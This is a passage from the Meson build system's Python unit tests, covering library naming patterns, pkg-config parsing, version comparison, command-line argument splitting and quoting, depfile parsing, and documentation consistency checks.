with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
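# Illustrative note (an assumption about the OpenBSD convention): shared
# libraries there are installed only as fully versioned files such as
# libfoo.so.54.0, without an unversioned libfoo.so symlink, so the
# lib{}.so.[0-9]*.[0-9]* pattern is globbed and the highest version wins,
# which is why libfoo.so.54.0 is picked over libfoo.so.6.0 above.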
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c_link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
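# Illustrative note (summarizing the mocked behaviour above): pkg-config
# only reports '-L<dir> -l<name>' pairs, and meson resolves each -l<name>
# against the -L directories to the concrete library file found there
# (here the static libfoo.a / libbar.a created above), while the core
# system libraries (pthread, m, c, dl, rt) are never resolved to static
# archives.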
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
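# Illustrative usage (derived from the table above, not an extra check):
#     Version('2.0.1a') > Version('2.0.1')   -> True
#     Version('1.0')    < Version('1.0.0')   -> True
#     Version('2.001') == Version('2.1')     -> True
# and version_compare_many('0.99.beta19', '>= 0.99.beta14') returns a tuple
# whose first element is the overall boolean result.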
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
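# Illustrative note (summarizing the cases above): split_args() follows the
# platform's own quoting rules, i.e. the MSVC argument-parsing rules linked
# above on Windows and POSIX shell-style splitting elsewhere, and
# join_args() is only guaranteed to round-trip the inputs flagged True.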
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# line continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
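# Illustrative note (restating the cases above): a depfile is the
# Makefile-style fragment a compiler emits (e.g. via -MD/-MF), such as
#     meson/foo.o: foo.c foo.h
#     foo.c: gen.py
# and get_all_dependencies() follows the rules transitively, so the
# dependencies of meson/foo.o include gen.py as well.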
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
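# Illustrative note (an assumption about the intent): sort_libpaths()
# reorders the library search paths to follow the order of the pkg-config
# directories given as the second argument, which is why every input
# permutation above collapses to the same user-local, /usr/local, /usr
# ordering.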
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown file in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that the syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that all the functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
